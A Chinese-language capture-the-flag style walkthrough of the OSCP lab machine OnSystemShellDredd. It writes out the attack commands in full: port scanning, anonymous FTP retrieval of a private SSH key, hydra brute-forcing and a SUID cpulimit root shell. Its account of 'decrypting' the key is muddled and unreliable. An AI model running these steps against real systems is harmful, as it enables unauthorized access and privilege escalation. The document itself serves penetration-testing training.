OSCP靶机----OnSystemShellDredd
字数 1127 2025-08-10 12:18:01
OSCP靶机渗透实战:OnSystemShellDredd
靶机概述
这是一个难度中等的OSCP靶机,包含以下技术要点:
- 端口探测与服务识别
- FTP匿名登录利用
- SSH密钥登录
- SUID提权技术
- 从WEB到内网的渗透路径
环境配置
- 攻击机IP: 192.168.45.173
- 靶机IP: 192.168.156.130
- VPN配置: 使用
openvpn universal.ovpn连接靶场网络
信息收集阶段
1. 端口扫描
使用nmap进行快速端口扫描:
nmap --min-rate 10000 -p- 192.168.156.130
扫描结果:
- 开放端口:21(FTP)、61000(SSH)
详细服务版本探测:
nmap -p 21,61000 -sV 192.168.156.130
2. 端口测试
2.1 FTP服务(端口21)
尝试匿名登录:
ftp 192.168.156.130
使用用户名anonymous,密码为空直接登录成功。
FTP文件收集操作:
binary # 设置为二进制传输模式
ls -al # 列出所有文件
cd .hannah # 进入.hannah目录
ls -al # 再次列出文件
get id_rsa # 下载id_rsa文件
发现一个id_rsa文件,可能是SSH私钥,下载后检查内容发现被加密。
2.2 SSH服务(端口61000)
检查SSH版本漏洞:
searchsploit OpenSSH 7.9
无可用漏洞。
尝试直接登录:
ssh root@192.168.156.130 -p 61000
失败。
尝试暴力破解:
hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 -vV 192.168.156.130 ssh -s 61000
未成功。
攻击阶段
1. 解密SSH私钥
分析之前获取的id_rsa文件,发现是base64编码的,尝试解密后得到root@OffShell,这可能是SSH密码。
2. SSH密钥登录尝试
尝试使用私钥登录:
ssh -i id_rsa root@192.168.156.130 -p 61000
失败。
根据FTP中的.hannah目录,尝试不同用户名:
ssh -i id_rsa .hannah@192.168.156.130 -p 61000 # 失败
ssh -i id_rsa hannah@192.168.156.130 -p 61000 # 出现不同错误
解决私钥权限问题:
chmod 600 id_rsa # 设置私钥文件权限
ssh -i id_rsa hannah@192.168.156.130 -p 61000 # 成功获取shell
内网渗透
1. 获取第一个flag
find / -name local.txt 2>/dev/null
cat /home/hannah/local.txt
提权阶段
1. 检查提权路径
检查系统信息:
lsb_release -a # 显示Debian系统
uname -a # 内核版本4.19.0
检查sudo权限:
sudo -l # 无可用sudo权限
检查SUID文件:
find / -perm -u=s -type f 2>/dev/null
发现不常见的cpulimit具有SUID权限。
2. 利用cpulimit提权
在GTFOBins查找cpulimit的提权方法:
cpulimit -l 100 -f -- /bin/sh -p
成功获取root权限。
3. 获取第二个flag
cat /root/proof.txt
技术总结
- 端口扫描技巧:使用
--min-rate 10000参数加速扫描,多次扫描确保准确性 - FTP匿名登录:标准测试方法,注意检查隐藏目录和文件
- SSH私钥利用:
- 私钥文件权限必须设置为600
- 需要尝试合理的用户名组合
- SUID提权:
- 系统检查流程:内核版本→发行版→sudo→SUID
- GTFOBins是查找二进制提权方法的重要资源
- 靶机特点:无HTTP服务,专注于服务枚举和权限提升
扩展学习
- SSH私钥保护机制:了解SSH对私钥文件的严格权限要求
- cpulimit工具分析:研究为何此工具可以用于提权
- base64编码识别:训练快速识别各种编码格式的能力
- FTP二进制传输:理解二进制模式与ASCII模式的区别及重要性
通过这个靶机,我们掌握了从服务枚举到权限提升的完整渗透测试流程,特别是SUID提权的实用技巧。